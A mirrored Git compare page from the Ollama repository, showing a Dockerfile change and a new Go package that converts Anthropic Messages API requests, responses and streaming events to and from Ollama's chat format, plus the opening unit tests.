mirror of
https://github.com/ollama/ollama.git
synced 2026-01-11 09:00:53 -05:00
Compare commits
9 Commits
parth/agen
...
mlx-gpu-cd
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
e23ddd84b8 | ||
|
|
7cc2a653f2 | ||
|
|
2584940016 | ||
|
|
c6d4c0c7f2 | ||
|
|
1ef4241727 | ||
|
|
68fafd3002 | ||
|
|
2b2cda7a2b | ||
|
|
3cfe9fe146 | ||
|
|
a23b559b4c |
@@ -161,10 +161,6 @@ ARG GOFLAGS="'-ldflags=-w -s'"
|
||||
ENV CGO_ENABLED=1
|
||||
ARG CGO_CFLAGS
|
||||
ARG CGO_CXXFLAGS
|
||||
# TODO wire up the actual MLX engine here instead of building the main binary...
|
||||
RUN mkdir -p dist/bin
|
||||
RUN go build -tags mlx -trimpath -buildmode=pie -o dist/bin/imagegen ./x/imagegen/cmd/engine
|
||||
|
||||
|
||||
FROM base AS build
|
||||
WORKDIR /go/src/github.com/ollama/ollama
|
||||
@@ -186,7 +182,6 @@ COPY --from=cuda-12 dist/lib/ollama /lib/ollama/
|
||||
COPY --from=cuda-13 dist/lib/ollama /lib/ollama/
|
||||
COPY --from=vulkan dist/lib/ollama /lib/ollama/
|
||||
COPY --from=mlx /go/src/github.com/ollama/ollama/dist/lib/ollama /lib/ollama/
|
||||
COPY --from=mlx /go/src/github.com/ollama/ollama/dist/bin/ /bin/
|
||||
|
||||
FROM --platform=linux/arm64 scratch AS arm64
|
||||
# COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/
|
||||
@@ -205,7 +200,7 @@ COPY --from=build /bin/ollama /bin/ollama
|
||||
|
||||
FROM ubuntu:24.04
|
||||
RUN apt-get update \
|
||||
&& apt-get install -y ca-certificates libvulkan1 \
|
||||
&& apt-get install -y ca-certificates libvulkan1 libopenblas0 \
|
||||
&& apt-get clean \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
COPY --from=archive /bin /usr/bin
|
||||
|
||||
778
anthropic/anthropic.go
Normal file
778
anthropic/anthropic.go
Normal file
@@ -0,0 +1,778 @@
|
||||
package anthropic
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"log/slog"
|
||||
"net/http"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// Error types matching Anthropic API
|
||||
type Error struct {
|
||||
Type string `json:"type"`
|
||||
Message string `json:"message"`
|
||||
}
|
||||
|
||||
type ErrorResponse struct {
|
||||
Type string `json:"type"` // always "error"
|
||||
Error Error `json:"error"`
|
||||
RequestID string `json:"request_id,omitempty"`
|
||||
}
|
||||
|
||||
// NewError creates a new ErrorResponse with the appropriate error type based on HTTP status code
|
||||
func NewError(code int, message string) ErrorResponse {
|
||||
var etype string
|
||||
switch code {
|
||||
case http.StatusBadRequest:
|
||||
etype = "invalid_request_error"
|
||||
case http.StatusUnauthorized:
|
||||
etype = "authentication_error"
|
||||
case http.StatusForbidden:
|
||||
etype = "permission_error"
|
||||
case http.StatusNotFound:
|
||||
etype = "not_found_error"
|
||||
case http.StatusTooManyRequests:
|
||||
etype = "rate_limit_error"
|
||||
case http.StatusServiceUnavailable, 529:
|
||||
etype = "overloaded_error"
|
||||
default:
|
||||
etype = "api_error"
|
||||
}
|
||||
|
||||
return ErrorResponse{
|
||||
Type: "error",
|
||||
Error: Error{Type: etype, Message: message},
|
||||
RequestID: generateID("req"),
|
||||
}
|
||||
}
|
||||
|
||||
// Request types
|
||||
|
||||
// MessagesRequest represents an Anthropic Messages API request
|
||||
type MessagesRequest struct {
|
||||
Model string `json:"model"`
|
||||
MaxTokens int `json:"max_tokens"`
|
||||
Messages []MessageParam `json:"messages"`
|
||||
System any `json:"system,omitempty"` // string or []ContentBlock
|
||||
Stream bool `json:"stream,omitempty"`
|
||||
Temperature *float64 `json:"temperature,omitempty"`
|
||||
TopP *float64 `json:"top_p,omitempty"`
|
||||
TopK *int `json:"top_k,omitempty"`
|
||||
StopSequences []string `json:"stop_sequences,omitempty"`
|
||||
Tools []Tool `json:"tools,omitempty"`
|
||||
ToolChoice *ToolChoice `json:"tool_choice,omitempty"`
|
||||
Thinking *ThinkingConfig `json:"thinking,omitempty"`
|
||||
Metadata *Metadata `json:"metadata,omitempty"`
|
||||
}
|
||||
|
||||
// MessageParam represents a message in the request
|
||||
type MessageParam struct {
|
||||
Role string `json:"role"` // "user" or "assistant"
|
||||
Content any `json:"content"` // string or []ContentBlock
|
||||
}
|
||||
|
||||
// ContentBlock represents a content block in a message.
|
||||
// Text and Thinking use pointers so they serialize as the field being present (even if empty)
|
||||
// only when set, which is required for SDK streaming accumulation.
|
||||
type ContentBlock struct {
|
||||
Type string `json:"type"` // text, image, tool_use, tool_result, thinking
|
||||
|
||||
// For text blocks - pointer so field only appears when set (SDK requires it for accumulation)
|
||||
Text *string `json:"text,omitempty"`
|
||||
|
||||
// For image blocks
|
||||
Source *ImageSource `json:"source,omitempty"`
|
||||
|
||||
// For tool_use blocks
|
||||
ID string `json:"id,omitempty"`
|
||||
Name string `json:"name,omitempty"`
|
||||
Input any `json:"input,omitempty"`
|
||||
|
||||
// For tool_result blocks
|
||||
ToolUseID string `json:"tool_use_id,omitempty"`
|
||||
Content any `json:"content,omitempty"` // string or []ContentBlock
|
||||
IsError bool `json:"is_error,omitempty"`
|
||||
|
||||
// For thinking blocks - pointer so field only appears when set (SDK requires it for accumulation)
|
||||
Thinking *string `json:"thinking,omitempty"`
|
||||
Signature string `json:"signature,omitempty"`
|
||||
}
|
||||
|
||||
// ImageSource represents the source of an image
|
||||
type ImageSource struct {
|
||||
Type string `json:"type"` // "base64" or "url"
|
||||
MediaType string `json:"media_type,omitempty"`
|
||||
Data string `json:"data,omitempty"`
|
||||
URL string `json:"url,omitempty"`
|
||||
}
|
||||
|
||||
// Tool represents a tool definition
|
||||
type Tool struct {
|
||||
Type string `json:"type,omitempty"` // "custom" for user-defined tools
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description,omitempty"`
|
||||
InputSchema json.RawMessage `json:"input_schema,omitempty"`
|
||||
}
|
||||
|
||||
// ToolChoice controls how the model uses tools
|
||||
type ToolChoice struct {
|
||||
Type string `json:"type"` // "auto", "any", "tool", "none"
|
||||
Name string `json:"name,omitempty"`
|
||||
DisableParallelToolUse bool `json:"disable_parallel_tool_use,omitempty"`
|
||||
}
|
||||
|
||||
// ThinkingConfig controls extended thinking
|
||||
type ThinkingConfig struct {
|
||||
Type string `json:"type"` // "enabled" or "disabled"
|
||||
BudgetTokens int `json:"budget_tokens,omitempty"`
|
||||
}
|
||||
|
||||
// Metadata for the request
|
||||
type Metadata struct {
|
||||
UserID string `json:"user_id,omitempty"`
|
||||
}
|
||||
|
||||
// Response types
|
||||
|
||||
// MessagesResponse represents an Anthropic Messages API response
|
||||
type MessagesResponse struct {
|
||||
ID string `json:"id"`
|
||||
Type string `json:"type"` // "message"
|
||||
Role string `json:"role"` // "assistant"
|
||||
Model string `json:"model"`
|
||||
Content []ContentBlock `json:"content"`
|
||||
StopReason string `json:"stop_reason,omitempty"`
|
||||
StopSequence string `json:"stop_sequence,omitempty"`
|
||||
Usage Usage `json:"usage"`
|
||||
}
|
||||
|
||||
// Usage contains token usage information
|
||||
type Usage struct {
|
||||
InputTokens int `json:"input_tokens"`
|
||||
OutputTokens int `json:"output_tokens"`
|
||||
}
|
||||
|
||||
// Streaming event types
|
||||
|
||||
// MessageStartEvent is sent at the start of streaming
|
||||
type MessageStartEvent struct {
|
||||
Type string `json:"type"` // "message_start"
|
||||
Message MessagesResponse `json:"message"`
|
||||
}
|
||||
|
||||
// ContentBlockStartEvent signals the start of a content block
|
||||
type ContentBlockStartEvent struct {
|
||||
Type string `json:"type"` // "content_block_start"
|
||||
Index int `json:"index"`
|
||||
ContentBlock ContentBlock `json:"content_block"`
|
||||
}
|
||||
|
||||
// ContentBlockDeltaEvent contains incremental content updates
|
||||
type ContentBlockDeltaEvent struct {
|
||||
Type string `json:"type"` // "content_block_delta"
|
||||
Index int `json:"index"`
|
||||
Delta Delta `json:"delta"`
|
||||
}
|
||||
|
||||
// Delta represents an incremental update
|
||||
type Delta struct {
|
||||
Type string `json:"type"` // "text_delta", "input_json_delta", "thinking_delta", "signature_delta"
|
||||
Text string `json:"text,omitempty"`
|
||||
PartialJSON string `json:"partial_json,omitempty"`
|
||||
Thinking string `json:"thinking,omitempty"`
|
||||
Signature string `json:"signature,omitempty"`
|
||||
}
|
||||
|
||||
// ContentBlockStopEvent signals the end of a content block
|
||||
type ContentBlockStopEvent struct {
|
||||
Type string `json:"type"` // "content_block_stop"
|
||||
Index int `json:"index"`
|
||||
}
|
||||
|
||||
// MessageDeltaEvent contains updates to the message
|
||||
type MessageDeltaEvent struct {
|
||||
Type string `json:"type"` // "message_delta"
|
||||
Delta MessageDelta `json:"delta"`
|
||||
Usage DeltaUsage `json:"usage"`
|
||||
}
|
||||
|
||||
// MessageDelta contains stop information
|
||||
type MessageDelta struct {
|
||||
StopReason string `json:"stop_reason,omitempty"`
|
||||
StopSequence string `json:"stop_sequence,omitempty"`
|
||||
}
|
||||
|
||||
// DeltaUsage contains cumulative token usage
|
||||
type DeltaUsage struct {
|
||||
OutputTokens int `json:"output_tokens"`
|
||||
}
|
||||
|
||||
// MessageStopEvent signals the end of the message
|
||||
type MessageStopEvent struct {
|
||||
Type string `json:"type"` // "message_stop"
|
||||
}
|
||||
|
||||
// PingEvent is a keepalive event
|
||||
type PingEvent struct {
|
||||
Type string `json:"type"` // "ping"
|
||||
}
|
||||
|
||||
// StreamErrorEvent is an error during streaming
|
||||
type StreamErrorEvent struct {
|
||||
Type string `json:"type"` // "error"
|
||||
Error Error `json:"error"`
|
||||
}
|
||||
|
||||
// FromMessagesRequest converts an Anthropic MessagesRequest to an Ollama api.ChatRequest
|
||||
func FromMessagesRequest(r MessagesRequest) (*api.ChatRequest, error) {
|
||||
var messages []api.Message
|
||||
|
||||
if r.System != nil {
|
||||
switch sys := r.System.(type) {
|
||||
case string:
|
||||
if sys != "" {
|
||||
messages = append(messages, api.Message{Role: "system", Content: sys})
|
||||
}
|
||||
case []any:
|
||||
// System can be an array of content blocks
|
||||
var content strings.Builder
|
||||
for _, block := range sys {
|
||||
if blockMap, ok := block.(map[string]any); ok {
|
||||
if blockMap["type"] == "text" {
|
||||
if text, ok := blockMap["text"].(string); ok {
|
||||
content.WriteString(text)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if content.Len() > 0 {
|
||||
messages = append(messages, api.Message{Role: "system", Content: content.String()})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
for _, msg := range r.Messages {
|
||||
converted, err := convertMessage(msg)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
messages = append(messages, converted...)
|
||||
}
|
||||
|
||||
options := make(map[string]any)
|
||||
|
||||
options["num_predict"] = r.MaxTokens
|
||||
|
||||
if r.Temperature != nil {
|
||||
options["temperature"] = *r.Temperature
|
||||
}
|
||||
|
||||
if r.TopP != nil {
|
||||
options["top_p"] = *r.TopP
|
||||
}
|
||||
|
||||
if r.TopK != nil {
|
||||
options["top_k"] = *r.TopK
|
||||
}
|
||||
|
||||
if len(r.StopSequences) > 0 {
|
||||
options["stop"] = r.StopSequences
|
||||
}
|
||||
|
||||
var tools api.Tools
|
||||
for _, t := range r.Tools {
|
||||
tool, err := convertTool(t)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
tools = append(tools, tool)
|
||||
}
|
||||
|
||||
var think *api.ThinkValue
|
||||
if r.Thinking != nil && r.Thinking.Type == "enabled" {
|
||||
think = &api.ThinkValue{Value: true}
|
||||
}
|
||||
|
||||
stream := r.Stream
|
||||
|
||||
return &api.ChatRequest{
|
||||
Model: r.Model,
|
||||
Messages: messages,
|
||||
Options: options,
|
||||
Stream: &stream,
|
||||
Tools: tools,
|
||||
Think: think,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// convertMessage converts an Anthropic MessageParam to Ollama api.Message(s)
|
||||
func convertMessage(msg MessageParam) ([]api.Message, error) {
|
||||
var messages []api.Message
|
||||
role := strings.ToLower(msg.Role)
|
||||
|
||||
switch content := msg.Content.(type) {
|
||||
case string:
|
||||
messages = append(messages, api.Message{Role: role, Content: content})
|
||||
|
||||
case []any:
|
||||
var textContent strings.Builder
|
||||
var images []api.ImageData
|
||||
var toolCalls []api.ToolCall
|
||||
var thinking string
|
||||
var toolResults []api.Message
|
||||
|
||||
for _, block := range content {
|
||||
blockMap, ok := block.(map[string]any)
|
||||
if !ok {
|
||||
return nil, errors.New("invalid content block format")
|
||||
}
|
||||
|
||||
blockType, _ := blockMap["type"].(string)
|
||||
|
||||
switch blockType {
|
||||
case "text":
|
||||
if text, ok := blockMap["text"].(string); ok {
|
||||
textContent.WriteString(text)
|
||||
}
|
||||
|
||||
case "image":
|
||||
source, ok := blockMap["source"].(map[string]any)
|
||||
if !ok {
|
||||
return nil, errors.New("invalid image source")
|
||||
}
|
||||
|
||||
sourceType, _ := source["type"].(string)
|
||||
if sourceType == "base64" {
|
||||
data, _ := source["data"].(string)
|
||||
decoded, err := base64.StdEncoding.DecodeString(data)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid base64 image data: %w", err)
|
||||
}
|
||||
images = append(images, decoded)
|
||||
} else {
|
||||
return nil, fmt.Errorf("invalid image source type: %s. Only base64 images are supported.", sourceType)
|
||||
}
|
||||
// URL images would need to be fetched - skip for now
|
||||
|
||||
case "tool_use":
|
||||
id, ok := blockMap["id"].(string)
|
||||
if !ok {
|
||||
return nil, errors.New("tool_use block missing required 'id' field")
|
||||
}
|
||||
name, ok := blockMap["name"].(string)
|
||||
if !ok {
|
||||
return nil, errors.New("tool_use block missing required 'name' field")
|
||||
}
|
||||
tc := api.ToolCall{
|
||||
ID: id,
|
||||
Function: api.ToolCallFunction{
|
||||
Name: name,
|
||||
},
|
||||
}
|
||||
if input, ok := blockMap["input"].(map[string]any); ok {
|
||||
tc.Function.Arguments = mapToArgs(input)
|
||||
}
|
||||
toolCalls = append(toolCalls, tc)
|
||||
|
||||
case "tool_result":
|
||||
toolUseID, _ := blockMap["tool_use_id"].(string)
|
||||
var resultContent string
|
||||
|
||||
switch c := blockMap["content"].(type) {
|
||||
case string:
|
||||
resultContent = c
|
||||
case []any:
|
||||
for _, cb := range c {
|
||||
if cbMap, ok := cb.(map[string]any); ok {
|
||||
if cbMap["type"] == "text" {
|
||||
if text, ok := cbMap["text"].(string); ok {
|
||||
resultContent += text
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: resultContent,
|
||||
ToolCallID: toolUseID,
|
||||
})
|
||||
|
||||
case "thinking":
|
||||
if t, ok := blockMap["thinking"].(string); ok {
|
||||
thinking = t
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if textContent.Len() > 0 || len(images) > 0 || len(toolCalls) > 0 || thinking != "" {
|
||||
m := api.Message{
|
||||
Role: role,
|
||||
Content: textContent.String(),
|
||||
Images: images,
|
||||
ToolCalls: toolCalls,
|
||||
Thinking: thinking,
|
||||
}
|
||||
messages = append(messages, m)
|
||||
}
|
||||
|
||||
// Add tool results as separate messages
|
||||
messages = append(messages, toolResults...)
|
||||
|
||||
default:
|
||||
return nil, fmt.Errorf("invalid message content type: %T", content)
|
||||
}
|
||||
|
||||
return messages, nil
|
||||
}
|
||||
|
||||
// convertTool converts an Anthropic Tool to an Ollama api.Tool
|
||||
func convertTool(t Tool) (api.Tool, error) {
|
||||
var params api.ToolFunctionParameters
|
||||
if len(t.InputSchema) > 0 {
|
||||
if err := json.Unmarshal(t.InputSchema, ¶ms); err != nil {
|
||||
return api.Tool{}, fmt.Errorf("invalid input_schema for tool %q: %w", t.Name, err)
|
||||
}
|
||||
}
|
||||
|
||||
return api.Tool{
|
||||
Type: "function",
|
||||
Function: api.ToolFunction{
|
||||
Name: t.Name,
|
||||
Description: t.Description,
|
||||
Parameters: params,
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
// ToMessagesResponse converts an Ollama api.ChatResponse to an Anthropic MessagesResponse
|
||||
func ToMessagesResponse(id string, r api.ChatResponse) MessagesResponse {
|
||||
var content []ContentBlock
|
||||
|
||||
if r.Message.Thinking != "" {
|
||||
content = append(content, ContentBlock{
|
||||
Type: "thinking",
|
||||
Thinking: ptr(r.Message.Thinking),
|
||||
})
|
||||
}
|
||||
|
||||
if r.Message.Content != "" {
|
||||
content = append(content, ContentBlock{
|
||||
Type: "text",
|
||||
Text: ptr(r.Message.Content),
|
||||
})
|
||||
}
|
||||
|
||||
for _, tc := range r.Message.ToolCalls {
|
||||
content = append(content, ContentBlock{
|
||||
Type: "tool_use",
|
||||
ID: tc.ID,
|
||||
Name: tc.Function.Name,
|
||||
Input: tc.Function.Arguments,
|
||||
})
|
||||
}
|
||||
|
||||
stopReason := mapStopReason(r.DoneReason, len(r.Message.ToolCalls) > 0)
|
||||
|
||||
return MessagesResponse{
|
||||
ID: id,
|
||||
Type: "message",
|
||||
Role: "assistant",
|
||||
Model: r.Model,
|
||||
Content: content,
|
||||
StopReason: stopReason,
|
||||
Usage: Usage{
|
||||
InputTokens: r.Metrics.PromptEvalCount,
|
||||
OutputTokens: r.Metrics.EvalCount,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// mapStopReason converts Ollama done_reason to Anthropic stop_reason
|
||||
func mapStopReason(reason string, hasToolCalls bool) string {
|
||||
if hasToolCalls {
|
||||
return "tool_use"
|
||||
}
|
||||
|
||||
switch reason {
|
||||
case "stop":
|
||||
return "end_turn"
|
||||
case "length":
|
||||
return "max_tokens"
|
||||
default:
|
||||
if reason != "" {
|
||||
return "stop_sequence"
|
||||
}
|
||||
return ""
|
||||
}
|
||||
}
|
||||
|
||||
// StreamConverter manages state for converting Ollama streaming responses to Anthropic format
|
||||
type StreamConverter struct {
|
||||
ID string
|
||||
Model string
|
||||
firstWrite bool
|
||||
contentIndex int
|
||||
inputTokens int
|
||||
outputTokens int
|
||||
thinkingStarted bool
|
||||
thinkingDone bool
|
||||
textStarted bool
|
||||
toolCallsSent map[string]bool
|
||||
}
|
||||
|
||||
func NewStreamConverter(id, model string) *StreamConverter {
|
||||
return &StreamConverter{
|
||||
ID: id,
|
||||
Model: model,
|
||||
firstWrite: true,
|
||||
toolCallsSent: make(map[string]bool),
|
||||
}
|
||||
}
|
||||
|
||||
// StreamEvent represents a streaming event to be sent to the client
|
||||
type StreamEvent struct {
|
||||
Event string
|
||||
Data any
|
||||
}
|
||||
|
||||
// Process converts an Ollama ChatResponse to Anthropic streaming events
|
||||
func (c *StreamConverter) Process(r api.ChatResponse) []StreamEvent {
|
||||
var events []StreamEvent
|
||||
|
||||
if c.firstWrite {
|
||||
c.firstWrite = false
|
||||
c.inputTokens = r.Metrics.PromptEvalCount
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "message_start",
|
||||
Data: MessageStartEvent{
|
||||
Type: "message_start",
|
||||
Message: MessagesResponse{
|
||||
ID: c.ID,
|
||||
Type: "message",
|
||||
Role: "assistant",
|
||||
Model: c.Model,
|
||||
Content: []ContentBlock{},
|
||||
Usage: Usage{
|
||||
InputTokens: c.inputTokens,
|
||||
OutputTokens: 0,
|
||||
},
|
||||
},
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
if r.Message.Thinking != "" && !c.thinkingDone {
|
||||
if !c.thinkingStarted {
|
||||
c.thinkingStarted = true
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_start",
|
||||
Data: ContentBlockStartEvent{
|
||||
Type: "content_block_start",
|
||||
Index: c.contentIndex,
|
||||
ContentBlock: ContentBlock{
|
||||
Type: "thinking",
|
||||
Thinking: ptr(""),
|
||||
},
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_delta",
|
||||
Data: ContentBlockDeltaEvent{
|
||||
Type: "content_block_delta",
|
||||
Index: c.contentIndex,
|
||||
Delta: Delta{
|
||||
Type: "thinking_delta",
|
||||
Thinking: r.Message.Thinking,
|
||||
},
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
if r.Message.Content != "" {
|
||||
if c.thinkingStarted && !c.thinkingDone {
|
||||
c.thinkingDone = true
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_stop",
|
||||
Data: ContentBlockStopEvent{
|
||||
Type: "content_block_stop",
|
||||
Index: c.contentIndex,
|
||||
},
|
||||
})
|
||||
c.contentIndex++
|
||||
}
|
||||
|
||||
if !c.textStarted {
|
||||
c.textStarted = true
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_start",
|
||||
Data: ContentBlockStartEvent{
|
||||
Type: "content_block_start",
|
||||
Index: c.contentIndex,
|
||||
ContentBlock: ContentBlock{
|
||||
Type: "text",
|
||||
Text: ptr(""),
|
||||
},
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_delta",
|
||||
Data: ContentBlockDeltaEvent{
|
||||
Type: "content_block_delta",
|
||||
Index: c.contentIndex,
|
||||
Delta: Delta{
|
||||
Type: "text_delta",
|
||||
Text: r.Message.Content,
|
||||
},
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
for _, tc := range r.Message.ToolCalls {
|
||||
if c.toolCallsSent[tc.ID] {
|
||||
continue
|
||||
}
|
||||
|
||||
if c.textStarted {
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_stop",
|
||||
Data: ContentBlockStopEvent{
|
||||
Type: "content_block_stop",
|
||||
Index: c.contentIndex,
|
||||
},
|
||||
})
|
||||
c.contentIndex++
|
||||
c.textStarted = false
|
||||
}
|
||||
|
||||
argsJSON, err := json.Marshal(tc.Function.Arguments)
|
||||
if err != nil {
|
||||
slog.Error("failed to marshal tool arguments", "error", err, "tool_id", tc.ID)
|
||||
continue
|
||||
}
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_start",
|
||||
Data: ContentBlockStartEvent{
|
||||
Type: "content_block_start",
|
||||
Index: c.contentIndex,
|
||||
ContentBlock: ContentBlock{
|
||||
Type: "tool_use",
|
||||
ID: tc.ID,
|
||||
Name: tc.Function.Name,
|
||||
Input: map[string]any{},
|
||||
},
|
||||
},
|
||||
})
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_delta",
|
||||
Data: ContentBlockDeltaEvent{
|
||||
Type: "content_block_delta",
|
||||
Index: c.contentIndex,
|
||||
Delta: Delta{
|
||||
Type: "input_json_delta",
|
||||
PartialJSON: string(argsJSON),
|
||||
},
|
||||
},
|
||||
})
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_stop",
|
||||
Data: ContentBlockStopEvent{
|
||||
Type: "content_block_stop",
|
||||
Index: c.contentIndex,
|
||||
},
|
||||
})
|
||||
|
||||
c.toolCallsSent[tc.ID] = true
|
||||
c.contentIndex++
|
||||
}
|
||||
|
||||
if r.Done {
|
||||
if c.textStarted {
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_stop",
|
||||
Data: ContentBlockStopEvent{
|
||||
Type: "content_block_stop",
|
||||
Index: c.contentIndex,
|
||||
},
|
||||
})
|
||||
} else if c.thinkingStarted && !c.thinkingDone {
|
||||
events = append(events, StreamEvent{
|
||||
Event: "content_block_stop",
|
||||
Data: ContentBlockStopEvent{
|
||||
Type: "content_block_stop",
|
||||
Index: c.contentIndex,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
c.outputTokens = r.Metrics.EvalCount
|
||||
stopReason := mapStopReason(r.DoneReason, len(c.toolCallsSent) > 0)
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "message_delta",
|
||||
Data: MessageDeltaEvent{
|
||||
Type: "message_delta",
|
||||
Delta: MessageDelta{
|
||||
StopReason: stopReason,
|
||||
},
|
||||
Usage: DeltaUsage{
|
||||
OutputTokens: c.outputTokens,
|
||||
},
|
||||
},
|
||||
})
|
||||
|
||||
events = append(events, StreamEvent{
|
||||
Event: "message_stop",
|
||||
Data: MessageStopEvent{
|
||||
Type: "message_stop",
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
return events
|
||||
}
|
||||
|
||||
// generateID generates a unique ID with the given prefix using crypto/rand
|
||||
func generateID(prefix string) string {
|
||||
b := make([]byte, 12)
|
||||
if _, err := rand.Read(b); err != nil {
|
||||
// Fallback to time-based ID if crypto/rand fails
|
||||
return fmt.Sprintf("%s_%d", prefix, time.Now().UnixNano())
|
||||
}
|
||||
return fmt.Sprintf("%s_%x", prefix, b)
|
||||
}
|
||||
|
||||
// GenerateMessageID generates a unique message ID
|
||||
func GenerateMessageID() string {
|
||||
return generateID("msg")
|
||||
}
|
||||
|
||||
// ptr returns a pointer to the given string value
|
||||
func ptr(s string) *string {
|
||||
return &s
|
||||
}
|
||||
|
||||
// mapToArgs converts a map to ToolCallFunctionArguments
|
||||
func mapToArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
953
anthropic/anthropic_test.go
Normal file
953
anthropic/anthropic_test.go
Normal file
@@ -0,0 +1,953 @@
|
||||
package anthropic
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"testing"
|
||||
|
||||
"github.com/google/go-cmp/cmp"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
const (
|
||||
testImage = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
||||
)
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_Basic(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
Messages: []MessageParam{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "test-model" {
|
||||
t.Errorf("expected model 'test-model', got %q", result.Model)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 1 {
|
||||
t.Fatalf("expected 1 message, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
if result.Messages[0].Role != "user" || result.Messages[0].Content != "Hello" {
|
||||
t.Errorf("unexpected message: %+v", result.Messages[0])
|
||||
}
|
||||
|
||||
if numPredict, ok := result.Options["num_predict"].(int); !ok || numPredict != 1024 {
|
||||
t.Errorf("expected num_predict 1024, got %v", result.Options["num_predict"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithSystemPrompt(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
System: "You are a helpful assistant.",
|
||||
Messages: []MessageParam{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 2 {
|
||||
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
if result.Messages[0].Role != "system" || result.Messages[0].Content != "You are a helpful assistant." {
|
||||
t.Errorf("unexpected system message: %+v", result.Messages[0])
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithSystemPromptArray(t *testing.T) {
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 1024,
|
||||
System: []any{
|
||||
map[string]any{"type": "text", "text": "You are helpful."},
|
||||
map[string]any{"type": "text", "text": " Be concise."},
|
||||
},
|
||||
Messages: []MessageParam{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if len(result.Messages) != 2 {
|
||||
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
|
||||
}
|
||||
|
||||
if result.Messages[0].Content != "You are helpful. Be concise." {
|
||||
t.Errorf("unexpected system message content: %q", result.Messages[0].Content)
|
||||
}
|
||||
}
|
||||
|
||||
func TestFromMessagesRequest_WithOptions(t *testing.T) {
|
||||
temp := 0.7
|
||||
topP := 0.9
|
||||
topK := 40
|
||||
req := MessagesRequest{
|
||||
Model: "test-model",
|
||||
MaxTokens: 2048,
|
||||
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
|
||||
Temperature: &temp,
|
||||
TopP: &topP,
|
||||
TopK: &topK,
|
||||
StopSequences: []string{"\n", "END"},
|
||||
}
|
||||
|
||||
result, err := FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Options["temperature"] != 0.7 {
|
||||
t.Errorf("expected temperature 0.7, got %v", result.Options["temperature"])
|
||||
}
